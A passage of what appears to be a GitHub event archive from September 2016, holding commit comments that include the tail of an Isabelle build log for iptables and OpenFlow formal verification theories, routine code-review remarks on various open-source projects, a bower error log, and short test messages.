Common_Primitive_toString\r\nIptables_Semantics: theory Conntrack_State_Transform\r\nIptables_Semantics: theory Example_Semantics\r\nIptables_Semantics: theory Interfaces_Normalize\r\nIptables_Semantics: theory Ports_Normalize\r\nIptables_Semantics: theory No_Spoof\r\nIptables_Semantics: theory IpAddresses_Normalize\r\nIptables_Semantics: theory Protocols_Normalize\r\nIptables_Semantics: theory Interface_Replace\r\nIptables_Semantics: theory Transform\r\nIptables_Semantics: theory Primitive_Abstract\r\nIptables_Semantics: theory SimpleFw_Compliance\r\nIptables_Semantics: theory Code_Interface\r\nIptables_Semantics: theory Semantics_Embeddings\r\nIptables_Semantics: theory Iptables_Semantics\r\nIptables_Semantics: theory No_Spoof_Embeddings\r\nIptables_Semantics: theory Parser\r\nIptables_Semantics: theory Documentation\r\nIptables_Semantics: theory Code_haskell\r\nTiming Iptables_Semantics (8 threads, 255.610s elapsed time, 877.188s cpu time, 87.312s GC time, factor 3.43)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Iptables_Semantics/document.pdf\r\nFinished Iptables_Semantics (0:08:09 elapsed time, 0:18:42 cpu time, factor 2.29)\r\nBuilding Iptables_Semantics_Documentation ...\r\nTiming Iptables_Semantics_Documentation (8 threads, 5.093s elapsed time, 5.184s cpu time, 0.060s GC time, factor 1.02)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Iptables_Semantics_Documentation/document.pdf\r\nFinished Iptables_Semantics_Documentation (0:01:01 elapsed time, 0:00:56 cpu time, factor 0.91)\r\nBuilding OpenFlow ...\r\nOpenFlow: theory CaesarTheories\r\nOpenFlow: theory Sort_Descending\r\nOpenFlow: theory List_Group\r\nOpenFlow: theory Semantics_OpenFlow\r\nOpenFlow: theory OpenFlowMatches\r\nOpenFlow: theory FeatherweightOpenFlowComparison\r\nOpenFlow: theory OpenFlowAction\r\nOpenFlow: theory OpenFlowSerialize\r\nOpenFlow: theory LinuxRouterOpenFlowTranslation\r\nOpenFlow: theory OF_conv_test\r\nOpenFlow: theory RFC2544\r\nTiming OpenFlow (8 threads, 141.856s elapsed time, 631.244s cpu time, 53.392s GC time, factor 4.45)\r\nDocument at /root/Iptables_Semantics/thy/OpenFlow/of_outp/document.pdf\r\nFinished OpenFlow (0:04:15 elapsed time, 0:12:14 cpu time, factor 2.87)\r\nRunning Iptables_Semantics_Examples_Large2 ...\r\nIptables_Semantics_Examples_Large2: theory IP_Address_Space_Examples_All_Small\r\nIptables_Semantics_Examples_Large2: theory IP_Address_Space_Examples_All_Large\r\nTiming Iptables_Semantics_Examples_Large2 (8 threads, 7639.883s elapsed time, 37098.336s cpu time, 1897.312s GC time, factor 4.86)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Iptables_Semantics_Examples_Large2/document.pdf\r\nFinished Iptables_Semantics_Examples_Large2 (2:07:31 elapsed time, 10:18:33 cpu time, factor 4.85)\r\nRunning Iptables_Semantics_Examples_Large1 ...\r\nIptables_Semantics_Examples_Large1: theory TUM_Spoofing_new3\r\nIptables_Semantics_Examples_Large1: theory Analyze_TUM_Net_Firewall\r\nIptables_Semantics_Examples_Large1: theory TUM_Simple_FW\r\nTiming Iptables_Semantics_Examples_Large1 (8 threads, 6591.764s elapsed time, 25580.576s cpu time, 1122.508s GC time, factor 3.88)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Iptables_Semantics_Examples_Large1/document.pdf\r\nFinished Iptables_Semantics_Examples_Large1 (1:50:03 elapsed time, 7:06:31 cpu time, factor 3.87)\r\nRunning Iptables_Semantics_Examples ...\r\nIptables_Semantics_Examples: theory Analyze_Ringofsaturn_com\r\nIptables_Semantics_Examples: theory Analyze_medium_sized_company\r\nIptables_Semantics_Examples: theory Analyze_topos_generated\r\nIptables_Semantics_Examples: theory Analyze_SQRL_Shorewall\r\nIptables_Semantics_Examples: theory IP_Address_Space_Examples_All_Small\r\nIptables_Semantics_Examples: theory Parser_Test\r\nIptables_Semantics_Examples: theory Contrived_Example\r\nIptables_Semantics_Examples: theory SNS_IAS_Eduroam_Spoofing\r\nIptables_Semantics_Examples: theory SQRL_2015_nospoof\r\nIptables_Semantics_Examples: theory Parser6\r\nIptables_Semantics_Examples: theory Ports_Fail\r\nIptables_Semantics_Examples: theory Parser6_Test\r\nIptables_Semantics_Examples: theory Small_Examples\r\nIptables_Semantics_Examples: theory iptables_Ln_tuned_parsed\r\nIptables_Semantics_Examples: theory Analyze_Synology_Diskstation\r\nTiming Iptables_Semantics_Examples (8 threads, 2178.582s elapsed time, 5398.064s cpu time, 410.292s GC time, factor 2.48)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Iptables_Semantics_Examples/document.pdf\r\nFinished Iptables_Semantics_Examples (0:36:30 elapsed time, 1:30:15 cpu time, factor 2.47)\r\nRunning Bitmagic ...\r\nBitmagic: theory More_Bits_Int\r\nBitmagic: theory Bits_Integer\r\nBitmagic: theory Code_Target_Bits_Int\r\nTiming Bitmagic (8 threads, 14.443s elapsed time, 17.420s cpu time, 0.504s GC time, factor 1.21)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Iptables_Semantics/Bitmagic/document.pdf\r\nFinished Bitmagic (0:00:53 elapsed time, 0:00:50 cpu time, factor 0.94)\r\nRunning OpenFlow_Documentation ...\r\nOpenFlow_Documentation: theory OpenFlowDoc\r\nTiming OpenFlow_Documentation (8 threads, 3.313s elapsed time, 5.192s cpu time, 0.104s GC time, factor 1.57)\r\nDocument at /root/Iptables_Semantics/thy/OpenFlow/of_doc/document.pdf\r\nFinished OpenFlow_Documentation (0:00:17 elapsed time, 0:00:20 cpu time, factor 1.17)\r\nFinished at Di 20. Sep 06:36:44 CEST 2016\r\n4:49:39 elapsed time, 19:37:49 cpu time, factor 4.06\r\n```"}},"created_at":"2016-09-20T11:06:07Z"}
{"id":"4588944237","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19094284,"position":null,"line":null,"path":null,"commit_id":"dcf0d4f4b1403e904f467580fc86d2a249304f7d","created_at":"2016-09-20T11:06:09Z","updated_at":"2016-09-20T11:06:09Z","body":"Hi @torognes , I've added the new options to collect discarded sequences when subsampling. I am also trying a new way to split options into sub-categories. On my own copy of the repository, I've tried the new split for most commands and I settle with three categories (`Input`, `Parameters`, `Output`). Here is an example:\r\n```\r\nChimera detection\r\n  --uchime_denovo FILENAME    detect chimeras de novo\r\n  --uchime_ref FILENAME       detect chimeras using a reference database\r\n Input\r\n  --db FILENAME               reference database for --uchime_ref\r\n Parameters\r\n  --abskew REAL               min abundance ratio of parent vs chimera (2.0)\r\n  --dn REAL                   'no' vote pseudo-count (1.4)\r\n  --mindiffs INT              minimum number of differences in segment (3)\r\n  --mindiv REAL               minimum divergence from closest parent (0.8)\r\n  --minh REAL                 minimum score (0.28)\r\n  --self                      exclude identical labels for --uchime_ref\r\n  --selfid                    exclude identical sequences for --uchime_ref\r\n  --xn REAL                   'no' vote weight (8.0)\r\n Output\r\n  --alignwidth INT            width of alignment in uchimealn output (80)\r\n  --borderline FILENAME       output borderline chimeric sequences to file\r\n  --chimeras FILENAME         output chimeric sequences to file\r\n  --fasta_score               include chimera score in fasta output\r\n  --nonchimeras FILENAME      output non-chimeric sequences to file\r\n  --relabel STRING            relabel nonchimeras with this prefix string\r\n  --relabel_keep              keep the old label after the new when relabelling\r\n  --relabel_md5               relabel with md5 digest of normalized sequence\r\n  --relabel_sha1              relabel with sha1 digest of normalized sequence\r\n  --sizeout                   include abundance information when relabelling\r\n  --uchimealns FILENAME       output chimera alignments to file\r\n  --uchimeout FILENAME        output to chimera info to tab-separated file\r\n  --uchimeout5                make output compatible with uchime version 5\r\n  --xsize                     strip abundance information in output\r\n```\r\nBy `Parameters`, I mean options that have an effect on the analysis, the computation itself. `Output` is for options that change the output format. What do you think?"}},"created_at":"2016-09-20T11:06:09Z"}
{"id":"4588945917","type":"CommitCommentEvent","actor":{"login":"paiyakarthik"},"repo":{"name":"paiyakarthik/GUVI"},"payload":{"comment":{"id":19094287,"position":null,"line":null,"path":null,"commit_id":"72eda01a5ff53a26877fc6d3fe964a7c82e1d59d","created_at":"2016-09-20T11:06:33Z","updated_at":"2016-09-20T11:06:33Z","body":"paiyakarthik"}},"created_at":"2016-09-20T11:06:33Z"}
{"id":"4588946518","type":"CommitCommentEvent","actor":{"login":"zhasulan"},"repo":{"name":"bernii/gauge.js"},"payload":{"comment":{"id":19094289,"position":2,"line":2,"path":"bower.json","commit_id":"0323ad46862b08e4bf04dd368c6adeb2d66dd967","created_at":"2016-09-20T11:06:42Z","updated_at":"2016-09-20T11:06:42Z","body":"bower gauge.js=gauge.js#^1.2.1       not-cached https://github.com/bernii/gauge.js=gauge.js.git#^1.2.1\r\nbower gauge.js=gauge.js#^1.2.1          resolve https://github.com/bernii/gauge.js=gauge.js.git#^1.2.1\r\nbower gauge.js#*                         cached https://github.com/bernii/gauge.js.git#1.2.1\r\nbower gauge.js#*                       validate 1.2.1 against https://github.com/bernii/gauge.js.git#*\r\nbower gauge.js=gauge.js#^1.2.1          ECMDERR Failed to execute \"git ls-remote --tags --heads https://github.com/bernii/gauge.js=gauge.js.git\", exit code of #128 fatal: unable to access 'https://github.com/bernii/gauge.js=gauge.js.git/': The requested URL ret\r\nurned error: 400\r\n\r\nAdditional error details:\r\nfatal: unable to access 'https://github.com/bernii/gauge.js=gauge.js.git/': The requested URL returned error: 400\r\n"}},"created_at":"2016-09-20T11:06:42Z"}
{"id":"4588958407","type":"CommitCommentEvent","actor":{"login":"dvdvideo1234"},"repo":{"name":"dvdvideo1234/TrackAssemblyTool"},"payload":{"comment":{"id":19094310,"position":139,"line":134,"path":"lua/autorun/trackassembly_init.lua","commit_id":"51cdf45a3f0cac75f5ad8d743bc5654e41ac2eba","created_at":"2016-09-20T11:09:34Z","updated_at":"2016-09-20T11:09:34Z","body":"There is no need to check whenever the player is holding the physgun. This hook is dedicated to dropping a prop with the physgun and the weapon class will always be weapon_physgun, if Garry does not change something that is. Nonetheless it will always be called when the player drops something by releasing the left mouse button ( FIRE --> IN_ATTACK1 ) on the physgun."}},"created_at":"2016-09-20T11:09:34Z"}
{"id":"4588963171","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094320,"position":4,"line":536,"path":"src/FffPolygonGenerator.cpp","commit_id":"9ba3e301d615e0c42fb6bbed8a2c4771341850c4","created_at":"2016-09-20T11:10:42Z","updated_at":"2016-09-20T11:10:42Z","body":"Not really a radius if you're squaring it. Not a diameter, either. Why not just store the minimum area here?\r\n\r\nThis could also be moved down to where it is actually used and made constant."}},"created_at":"2016-09-20T11:10:42Z"}
{"id":"4588966261","type":"CommitCommentEvent","actor":{"login":"minowa1783"},"repo":{"name":"minowa1783/GitTest"},"payload":{"comment":{"id":19094326,"position":null,"line":null,"path":null,"commit_id":"61bcc85a325e8fc00b3145f792291db1f1d016fb","created_at":"2016-09-20T11:11:20Z","updated_at":"2016-09-20T11:11:20Z","body":"こんにちは"}},"created_at":"2016-09-20T11:11:20Z"}
{"id":"4588971127","type":"CommitCommentEvent","actor":{"login":"seisyuu"},"repo":{"name":"seisyuu/GitTestOikos"},"payload":{"comment":{"id":19094336,"position":null,"line":null,"path":null,"commit_id":"a0358fb09ab697078bd86a7940bdeb20523269b6","created_at":"2016-09-20T11:12:15Z","updated_at":"2016-09-20T11:12:15Z","body":"konnni\r\n"}},"created_at":"2016-09-20T11:12:15Z"}
{"id":"4588971221","type":"CommitCommentEvent","actor":{"login":"KeiTAKIHARA"},"repo":{"name":"minowa1783/GitTest"},"payload":{"comment":{"id":19094337,"position":null,"line":null,"path":null,"commit_id":"61bcc85a325e8fc00b3145f792291db1f1d016fb","created_at":"2016-09-20T11:12:16Z","updated_at":"2016-09-20T11:12:16Z","body":"こんにちは"}},"created_at":"2016-09-20T11:12:16Z"}
{"id":"4588973623","type":"CommitCommentEvent","actor":{"login":"markusmo3"},"repo":{"name":"iluwatar/java-design-patterns"},"payload":{"comment":{"id":19094342,"position":1,"line":3,"path":"abstract-document/etc/abstract-document.urm.puml","commit_id":"6026eedd51b9753250051b620312bbedd2ccd6ef","created_at":"2016-09-20T11:12:43Z","updated_at":"2016-09-20T11:12:43Z","body":"@iluwatar i dont quite understand why this change was necessary. Could you elaborate? I cannot determine any \"real\" differences, just some stuff shuffeled around for no apparent reason. The problem is you did get a different result when running the urm-maven-plugin, so your side might be flawed or old or somehow else different to mine and i can only guarantee my versions to be correct..."}},"created_at":"2016-09-20T11:12:43Z"}
{"id":"4588976952","type":"CommitCommentEvent","actor":{"login":"sa14"},"repo":{"name":"sa14/git.vibes"},"payload":{"comment":{"id":19094348,"position":null,"line":null,"path":null,"commit_id":"7311e0b50fb8ebc10aeb49924481cbdfc5b07c58","created_at":"2016-09-20T11:13:29Z","updated_at":"2016-09-20T11:13:29Z","body":"テスト"}},"created_at":"2016-09-20T11:13:29Z"}
{"id":"4588977484","type":"CommitCommentEvent","actor":{"login":"ta1ldren"},"repo":{"name":"ta1ldren/taichi"},"payload":{"comment":{"id":19094350,"position":null,"line":null,"path":null,"commit_id":"30b10aea4268c44abfb7ae46edff221d17eb5606","created_at":"2016-09-20T11:13:36Z","updated_at":"2016-09-20T11:13:36Z","body":"testテスト"}},"created_at":"2016-09-20T11:13:36Z"}
{"id":"4588981262","type":"CommitCommentEvent","actor":{"login":"acogoluegnes"},"repo":{"name":"rabbitmq/rabbitmq-java-client"},"payload":{"comment":{"id":19094363,"position":null,"line":null,"path":null,"commit_id":"e5330720cb092c317b0138d45eaa2c66c802f212","created_at":"2016-09-20T11:14:27Z","updated_at":"2016-09-20T11:14:27Z","body":"I was referring to the `SocketChannel`, but this is indeed on connection closing, not on AMQP channel closing."}},"created_at":"2016-09-20T11:14:27Z"}
{"id":"4588985427","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094380,"position":74,"line":389,"path":"src/java/org/apache/cassandra/db/compaction/Scrubber.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:15:25Z","updated_at":"2016-09-20T11:15:25Z","body":"Advancing here looks like a hack, method's name suggests no side effects."}},"created_at":"2016-09-20T11:15:25Z"}
{"id":"4588985629","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094382,"position":26,"line":128,"path":"src/java/org/apache/cassandra/db/compaction/Scrubber.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:15:28Z","updated_at":"2016-09-20T11:15:28Z","body":"Checking `hasIndexFile` first will make this code more readable."}},"created_at":"2016-09-20T11:15:28Z"}
{"id":"4588989321","type":"CommitCommentEvent","actor":{"login":"minowa1783"},"repo":{"name":"minowa1783/GitTest"},"payload":{"comment":{"id":19094395,"position":null,"line":null,"path":null,"commit_id":"61bcc85a325e8fc00b3145f792291db1f1d016fb","created_at":"2016-09-20T11:16:17Z","updated_at":"2016-09-20T11:16:17Z","body":"圭佑だお"}},"created_at":"2016-09-20T11:16:17Z"}
{"id":"4588990460","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19094397,"position":14,"line":108,"path":"src/Control/TimeWarp/Rpc/MonadRpc.hs","commit_id":"82fc95372fea421c860deb976d7141ef6168cffb","created_at":"2016-09-20T11:16:33Z","updated_at":"2016-09-20T11:16:33Z","body":"Why is it `-- *` instead of `-- |`?"}},"created_at":"2016-09-20T11:16:33Z"}
{"id":"4588990638","type":"CommitCommentEvent","actor":{"login":"CoderBaron"},"repo":{"name":"MobiDevelop/robovm"},"payload":{"comment":{"id":19094398,"position":null,"line":null,"path":null,"commit_id":"9fb578b40b01032ac5f08c11fde16d3b59f0f663","created_at":"2016-09-20T11:16:36Z","updated_at":"2016-09-20T11:16:36Z","body":"When editing auto-generated binding files, please make sure not to re-organize imports. It sometimes kills the `<import>` tags as in this case and we need to fix that manually when we want to regenerate the binding with bro-gen."}},"created_at":"2016-09-20T11:16:36Z"}
{"id":"4588990842","type":"CommitCommentEvent","actor":{"login":"affektde"},"repo":{"name":"jwilsson/spotify-web-api-php"},"payload":{"comment":{"id":19094401,"position":null,"line":null,"path":null,"commit_id":"ef608297271f0734a3a18b7a5e6ba40c1f41aa7a","created_at":"2016-09-20T11:16:39Z","updated_at":"2016-09-20T11:16:39Z","body":"Hello @jwilsson , thanks for your great work on this wrapper.\r\nDumb question:\r\nWill __$errorBody__ ever be set? \r\nFrom now on you will have always: __throw new SpotifyWebAPIException('An unknown error occurred.', $status);__\r\n\r\nI would write for now:\r\n\r\n```\r\n$body = json_decode($body);\r\n$error = (isset($body->error)) ? $body->error : null;\r\nif (isset($error->message) && isset($error->status)) {\r\n    // API call error\r\n    throw new SpotifyWebAPIException($error->message, $error->status);\r\n} else {\r\n    // Something went really wrong\r\n    throw new SpotifyWebAPIException('An unknown error occurred.', $status);\r\n}\r\n```\r\n\r\n__Maybe Spotify changed their Responses__\r\n"}},"created_at":"2016-09-20T11:16:39Z"}
{"id":"4588994533","type":"CommitCommentEvent","actor":{"login":"SamBoKing"},"repo":{"name":"SamBoKing/Secret"},"payload":{"comment":{"id":19094409,"position":null,"line":null,"path":null,"commit_id":"6d0d3b5a5c970d7cc32c203ae6bdf7242f79a5a8","created_at":"2016-09-20T11:17:30Z","updated_at":"2016-09-20T11:17:30Z","body":"복원"}},"created_at":"2016-09-20T11:17:30Z"}
{"id":"4588994788","type":"CommitCommentEvent","actor":{"login":"seisyuu"},"repo":{"name":"ta1ldren/taichi"},"payload":{"comment":{"id":19094411,"position":null,"line":null,"path":null,"commit_id":"30b10aea4268c44abfb7ae46edff221d17eb5606","created_at":"2016-09-20T11:17:34Z","updated_at":"2016-09-20T11:17:34Z","body":"たいち"}},"created_at":"2016-09-20T11:17:34Z"}
{"id":"4588997060","type":"CommitCommentEvent","actor":{"login":"seisyuu"},"repo":{"name":"sa14/git.vibes"},"payload":{"comment":{"id":19094415,"position":null,"line":null,"path":null,"commit_id":"7311e0b50fb8ebc10aeb49924481cbdfc5b07c58","created_at":"2016-09-20T11:18:06Z","updated_at":"2016-09-20T11:18:06Z","body":"ください"}},"created_at":"2016-09-20T11:18:06Z"}
{"id":"4588997669","type":"CommitCommentEvent","actor":{"login":"smurata101"},"repo":{"name":"ta1ldren/taichi"},"payload":{"comment":{"id":19094418,"position":null,"line":null,"path":null,"commit_id":"30b10aea4268c44abfb7ae46edff221d17eb5606","created_at":"2016-09-20T11:18:13Z","updated_at":"2016-09-20T11:18:13Z","body":"せいしゅう\r\n"}},"created_at":"2016-09-20T11:18:13Z"}
{"id":"4588997815","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19094419,"position":13,"line":274,"path":"src/Control/TimeWarp/Timed/TimedT.hs","commit_id":"89a83e8ee7c3960bdaecc3fe001bd8947b9de309","created_at":"2016-09-20T11:18:16Z","updated_at":"2016-09-20T11:18:16Z","body":"Don't you find it better to write\r\n```\r\nthrowInnard (SomeException e) = throwM e\r\n```\r\n?"}},"created_at":"2016-09-20T11:18:16Z"}
{"id":"4588998866","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094420,"position":6,"line":13,"path":"src/raft.cpp","commit_id":"4607d0a8ad07b0a289e9b1d31541f96c26d8ba15","created_at":"2016-09-20T11:18:31Z","updated_at":"2016-09-20T11:18:31Z","body":"Could be constant."}},"created_at":"2016-09-20T11:18:31Z"}
{"id":"4588999860","type":"CommitCommentEvent","actor":{"login":"ta1ldren"},"repo":{"name":"sa14/git.vibes"},"payload":{"comment":{"id":19094422,"position":null,"line":null,"path":null,"commit_id":"7311e0b50fb8ebc10aeb49924481cbdfc5b07c58","created_at":"2016-09-20T11:18:44Z","updated_at":"2016-09-20T11:18:44Z","body":"いいよ"}},"created_at":"2016-09-20T11:18:44Z"}
{"id":"4589000934","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094424,"position":61,"line":816,"path":"src/java/org/apache/cassandra/io/sstable/SSTableReader.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:18:59Z","updated_at":"2016-09-20T11:18:59Z","body":"A lot of repetition of this `if (hasBirchIndexs) ... new PageAlignedReader(...)` pattern. Couldn't this be extracted to a method (e.g. in `IndexedEntry`)?"}},"created_at":"2016-09-20T11:18:59Z"}
{"id":"4589002220","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19094429,"position":11,"line":11,"path":"README.md","commit_id":"f5bab3e4abdc458b08b3db1c848689de3ac6d18c","created_at":"2016-09-20T11:19:15Z","updated_at":"2016-09-20T11:19:15Z","body":"Probabilities?"}},"created_at":"2016-09-20T11:19:15Z"}
{"id":"4589003389","type":"CommitCommentEvent","actor":{"login":"tactim"},"repo":{"name":"sa14/git.test2"},"payload":{"comment":{"id":19094431,"position":null,"line":null,"path":null,"commit_id":"e7cc80fc162ec03c00cb0a7969b7cf47526ce541","created_at":"2016-09-20T11:19:33Z","updated_at":"2016-09-20T11:19:33Z","body":"reawe\r\n"}},"created_at":"2016-09-20T11:19:33Z"}
{"id":"4589005687","type":"CommitCommentEvent","actor":{"login":"SamBoKing"},"repo":{"name":"SamBoKing/Secret"},"payload":{"comment":{"id":19094435,"position":null,"line":null,"path":null,"commit_id":"e4f01f932275a1357d7fb2d184bb3e62657ed26e","created_at":"2016-09-20T11:20:06Z","updated_at":"2016-09-20T11:20:06Z","body":"복원"}},"created_at":"2016-09-20T11:20:06Z"}
{"id":"4589013982","type":"CommitCommentEvent","actor":{"login":"throni3git"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19094449,"position":null,"line":null,"path":null,"commit_id":"7e47e4163b0af042d746f212f873a350211badff","created_at":"2016-09-20T11:21:56Z","updated_at":"2016-09-20T11:21:56Z","body":"Hello again,\r\nI'd like to push this with the request for you to please drop in the code if it is ready ;) @march1993 "}},"created_at":"2016-09-20T11:21:56Z"}
{"id":"4589016783","type":"CommitCommentEvent","actor":{"login":"SamBoKing"},"repo":{"name":"SamBoKing/Secret"},"payload":{"comment":{"id":19094456,"position":null,"line":null,"path":null,"commit_id":"e4f01f932275a1357d7fb2d184bb3e62657ed26e","created_at":"2016-09-20T11:22:36Z","updated_at":"2016-09-20T11:22:36Z","body":"복원"}},"created_at":"2016-09-20T11:22:36Z"}
{"id":"4589017961","type":"CommitCommentEvent","actor":{"login":"Gruck"},"repo":{"name":"les-campagnards/navco"},"payload":{"comment":{"id":19094459,"position":7,"line":10,"path":"js/main.js","commit_id":"afcea441a0ac7221b4e5ac8aeb0bf06d95e10f95","created_at":"2016-09-20T11:22:53Z","updated_at":"2016-09-20T11:22:53Z","body":"https://devcenter.heroku.com/articles/node-websockets\r\n\r\nOne has to use the same port ws:// and http://\r\nSeems like there is a protocol upgrade possible, even if one uses the same ports."}},"created_at":"2016-09-20T11:22:53Z"}
{"id":"4589018822","type":"CommitCommentEvent","actor":{"login":"JukkaL"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19094461,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-20T11:23:04Z","updated_at":"2016-09-20T11:23:04Z","body":"It shouldn't be specific to `__add__` -- the same issue also affects other operator methods that have `r` variants, such as `__mul__`. Regular methods should be fine. This is caused by how `NotImplemented` works.\r\n\r\nAnd yes, mypy accepts some unsafe code, since IIRC there are some stdlib modules that motivated us to relax the checks that used to be stricter (can't remember which ones). My intention is to remove the remaining checks, as currently mypy is inconsistent (it complains about some things but not other things are pretty similar) and users will invariably be confused when mypy complains about these things, as the issue is very subtle.\r\n\r\nSo here's my thinking about this:\r\n* We'll remove most or all of the operator method specific checks at some point, and we'll live with the unsafety for the time being. I haven't seen any concrete examples where the unsafety has actually caused real-world trouble, but I've seen users getting confused by the safety checks multiple times.\r\n* In the future, consider having more specific checks that perhaps compare operator method signatures across all classes defined in the program instead of just within a single MRO list at a time. This would be a non-modular check, and thus it wouldn't be safe if there is dynamic loading of code etc., but I don't really care. So basically the idea is to only complain about this if we can actually highlight that some `__[r]foo__` methods in classes `X`, `Y` and `Z` are not compatible, not about things that could potentially be unsafe. It would also be important to generate an error message that explains what is going on in more detail. I haven't worked out the details of this yet, though.\r\n"}},"created_at":"2016-09-20T11:23:04Z"}
{"id":"4589024019","type":"CommitCommentEvent","actor":{"login":"tavisca-akatte"},"repo":{"name":"tavisca-nmandge/HotelSearchWCF"},"payload":{"comment":{"id":19094474,"position":5,"line":13,"path":"HotelBookingService/Implimentation/HotelListFirstDataResponse.cs","commit_id":"9c2f4ea2e6925be4c3d61adcf001abbfa49b998c","created_at":"2016-09-20T11:24:17Z","updated_at":"2016-09-20T11:24:17Z","body":"Please use proper variable naming conventions\r\ne.g. Here you could have named hotels instead of list and hotel instead of listHotel."}},"created_at":"2016-09-20T11:24:17Z"}
{"id":"4589024694","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19094476,"position":22,"line":78,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/KFunctionImpl.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T11:24:25Z","updated_at":"2016-09-20T11:24:25Z","body":"Probably it's worth to add a comment that this caller is used for call-by-name only.\r\nNow it's not so obvious that 'default' here from default parameters, not because of some other kind of defaults"}},"created_at":"2016-09-20T11:24:25Z"}
{"id":"4589027875","type":"CommitCommentEvent","actor":{"login":"mvougiou"},"repo":{"name":"mvougiou/DAQAggregator"},"payload":{"comment":{"id":19094481,"position":null,"line":null,"path":null,"commit_id":"54cf7a84f2204f660528e53c5873a7da7178dde8","created_at":"2016-09-20T11:25:09Z","updated_at":"2016-09-20T11:25:09Z","body":"Types of various global tts states (any type of the given service excluding 'tts_ici', 'tts_apve') are detected automatically by inspecting the tcds pm flashlist rows.\r\nEach global tts state object contains two fields for the perc busy and perc warning, respectively, which are filled from the flashlist. Since these columns are not yet in the flashlist, it is important to update the fieldnames/keys used to retrieve these values from the downloaded flashlist, according to the name that will be given to these columns, once they are added. It is enough to update the following fields, which contain the column names to be used to retrieve the values:\r\n\r\nString busyKey = \"outputFractionBusy\";\r\nString warningKey = \"outputFractionWarning\";\r\n\r\n(@ FlashlistDispatcher:258 and 259 of this commit)"}},"created_at":"2016-09-20T11:25:09Z"}
{"id":"4589028389","type":"CommitCommentEvent","actor":{"login":"neolith89"},"repo":{"name":"udaraz/Angular-Material-Dashboard"},"payload":{"comment":{"id":19094483,"position":null,"line":null,"path":null,"commit_id":"1ffe28e7acfa6c78d99e39e9f2412adb5edd5a3d","created_at":"2016-09-20T11:25:15Z","updated_at":"2016-09-20T11:25:15Z","body":"sssssssss"}},"created_at":"2016-09-20T11:25:15Z"}
{"id":"4589030266","type":"CommitCommentEvent","actor":{"login":"th0br0"},"repo":{"name":"policycompass/policycompass-frontend"},"payload":{"comment":{"id":19094486,"position":5,"line":81,"path":"app/fonts/policy.svg","commit_id":"bd809a44da320cdb98200db84d4f52b6e2cb550d","created_at":"2016-09-20T11:25:40Z","updated_at":"2016-09-20T11:25:40Z","body":"typo"}},"created_at":"2016-09-20T11:25:40Z"}
{"id":"4589032373","type":"CommitCommentEvent","actor":{"login":"MahiMarkoff"},"repo":{"name":"MahiMarkoff/exsercise"},"payload":{"comment":{"id":19094493,"position":null,"line":null,"path":null,"commit_id":"bee5d1cd22b2a1b954233882dd33f4843d9b085a","created_at":"2016-09-20T11:26:10Z","updated_at":"2016-09-20T11:26:10Z","body":"asdasdasd"}},"created_at":"2016-09-20T11:26:10Z"}
{"id":"4589033902","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19094495,"position":null,"line":null,"path":null,"commit_id":"5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e","created_at":"2016-09-20T11:26:29Z","updated_at":"2016-09-20T11:26:29Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all 